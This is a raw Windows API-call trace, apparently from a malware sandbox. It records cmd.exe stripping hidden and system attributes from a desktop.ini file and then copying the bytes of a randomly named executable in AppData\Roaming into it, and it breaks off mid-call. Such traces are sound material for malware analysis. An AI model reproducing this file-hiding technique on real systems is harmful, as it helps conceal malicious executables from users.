-1 [0145.300] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x18f61c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f668 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" ", lpProcessInformation=0x18f668*(hProcess=0x50, hThread=0x4c, dwProcessId=0x958, dwThreadId=0x98c)) returned 1 [0145.303] CloseHandle (hObject=0x4c) returned 1 [0145.303] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0145.303] GetEnvironmentStringsW () returned 0x3409d0* [0145.303] FreeEnvironmentStringsW (penv=0x3409d0) returned 1 [0145.303] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0145.344] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x18f55c | out: lpExitCode=0x18f55c*=0x0) returned 1 [0145.344] CloseHandle (hObject=0x50) returned 1 [0145.344] _vsnwprintf (in: _Buffer=0x18f6a4, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f568 | out: _Buffer="00000000") returned 8 [0145.344] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0145.345] GetEnvironmentStringsW () returned 0x342580* [0145.345] FreeEnvironmentStringsW (penv=0x342580) returned 1 [0145.345] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0145.345] GetEnvironmentStringsW () returned 0x342580* [0145.345] FreeEnvironmentStringsW (penv=0x342580) returned 1 
[0145.345] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f5c0 | out: lpAttributeList=0x18f5c0) [0145.345] GetConsoleTitleW (in: lpConsoleTitle=0x18f940, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0145.345] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x18e9b8, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x18e9bc, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x18e9b8*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0145.345] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0145.346] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0145.346] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0145.346] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\desktop.ini")) returned 0xffffffff [0145.346] GetLastError () returned 0x2 [0145.346] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1")) returned 0x10 [0145.346] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0145.346] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0145.346] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\desktop.ini")) returned 0xffffffff [0145.346] GetLastError () returned 0x2 [0145.346] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x34360c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x34360c) returned 0xffffffff [0145.346] GetLastError () returned 0x2 [0145.346] _get_osfhandle (_FileHandle=2) returned 0xb [0145.346] GetFileType (hFile=0xb) returned 
0x2 [0145.346] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0145.346] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18f3b8 | out: lpMode=0x18f3b8) returned 1 [0145.347] _get_osfhandle (_FileHandle=2) returned 0xb [0145.347] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x18f3ec | out: lpConsoleScreenBufferInfo=0x18f3ec) returned 1 [0145.347] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0145.347] _get_osfhandle (_FileHandle=1) returned 0x7 [0145.347] _get_osfhandle (_FileHandle=1) returned 0x7 [0145.347] _get_osfhandle (_FileHandle=1) returned 0x7 [0145.347] GetFileType (hFile=0x7) returned 0x2 [0145.347] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0145.347] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18fadc | out: lpMode=0x18fadc) returned 1 [0145.348] _dup (_FileHandle=1) returned 3 [0145.348] _close (_FileHandle=1) returned 0 [0145.348] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini", _String2="con") returned -53 [0145.348] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x18faac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0145.351] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0145.351] GetConsoleTitleW (in: lpConsoleTitle=0x18f8dc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0145.351] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x18f440, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f440) returned 0x340820 [0145.351] _wcsicmp (_String1="XEY8d7zI.exe", 
_String2=".") returned 74 [0145.351] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0145.351] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0145.352] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18e34c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0145.352] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0145.352] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.352] GetFileType (hFile=0x58) returned 0x1 [0145.352] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.352] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x18e3a4 | out: lpFileSizeHigh=0x18e3a4*=0x0) returned 0x7d600 [0145.352] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.352] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.352] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.352] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.352] GetFileType (hFile=0x50) returned 0x1 [0145.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.352] GetFileType (hFile=0x50) returned 0x1 [0145.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.352] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.354] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0145.354] GetFileType (hFile=0x50) returned 0x1 [0145.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.354] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.354] GetFileType (hFile=0x50) returned 0x1 [0145.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.354] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.354] GetFileType (hFile=0x50) returned 0x1 [0145.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.354] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.354] GetFileType (hFile=0x50) returned 0x1 [0145.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.354] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.354] GetFileType (hFile=0x50) returned 0x1 [0145.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.354] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.354] _get_osfhandle (_FileHandle=1) returned 0x50 
[0145.354] GetFileType (hFile=0x50) returned 0x1 [0145.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.355] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.355] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.355] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.355] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.355] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.355] GetFileType (hFile=0x50) returned 0x1 [0145.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.355] GetFileType (hFile=0x50) returned 0x1 [0145.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.355] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.355] GetFileType (hFile=0x50) returned 0x1 [0145.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.355] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.355] GetFileType (hFile=0x50) returned 0x1 [0145.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.355] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, 
lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.356] GetFileType (hFile=0x50) returned 0x1 [0145.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.356] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.356] GetFileType (hFile=0x50) returned 0x1 [0145.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.356] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.356] GetFileType (hFile=0x50) returned 0x1 [0145.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.356] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.356] GetFileType (hFile=0x50) returned 0x1 [0145.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.356] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.356] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.356] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.356] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.356] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.356] GetFileType (hFile=0x50) returned 0x1 [0145.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.356] GetFileType (hFile=0x50) returned 0x1 [0145.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.356] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.357] GetFileType (hFile=0x50) returned 0x1 [0145.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.357] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.357] GetFileType (hFile=0x50) returned 0x1 [0145.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.357] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.357] GetFileType (hFile=0x50) returned 0x1 [0145.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.357] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.357] GetFileType (hFile=0x50) returned 0x1 [0145.357] _get_osfhandle (_FileHandle=1) returned 
0x50 [0145.357] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.357] GetFileType (hFile=0x50) returned 0x1 [0145.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.357] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.357] GetFileType (hFile=0x50) returned 0x1 [0145.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.357] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.357] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.357] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.357] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.358] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.358] GetFileType (hFile=0x50) returned 0x1 [0145.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.358] GetFileType (hFile=0x50) returned 0x1 [0145.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.358] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) 
returned 1 [0145.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.358] GetFileType (hFile=0x50) returned 0x1 [0145.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.358] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.358] GetFileType (hFile=0x50) returned 0x1 [0145.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.358] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.358] GetFileType (hFile=0x50) returned 0x1 [0145.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.358] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.358] GetFileType (hFile=0x50) returned 0x1 [0145.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.358] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.358] GetFileType (hFile=0x50) returned 0x1 [0145.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.358] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.359] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0145.359] GetFileType (hFile=0x50) returned 0x1 [0145.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.359] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.359] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.359] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.359] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.359] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.359] GetFileType (hFile=0x50) returned 0x1 [0145.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.359] GetFileType (hFile=0x50) returned 0x1 [0145.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.359] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.359] GetFileType (hFile=0x50) returned 0x1 [0145.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.359] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.359] GetFileType (hFile=0x50) returned 0x1 [0145.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.359] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.359] GetFileType (hFile=0x50) returned 0x1 [0145.359] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.359] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.360] GetFileType (hFile=0x50) returned 0x1 [0145.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.360] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.360] GetFileType (hFile=0x50) returned 0x1 [0145.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.360] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.360] GetFileType (hFile=0x50) returned 0x1 [0145.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.360] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.360] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.360] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.360] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.360] ReadFile 
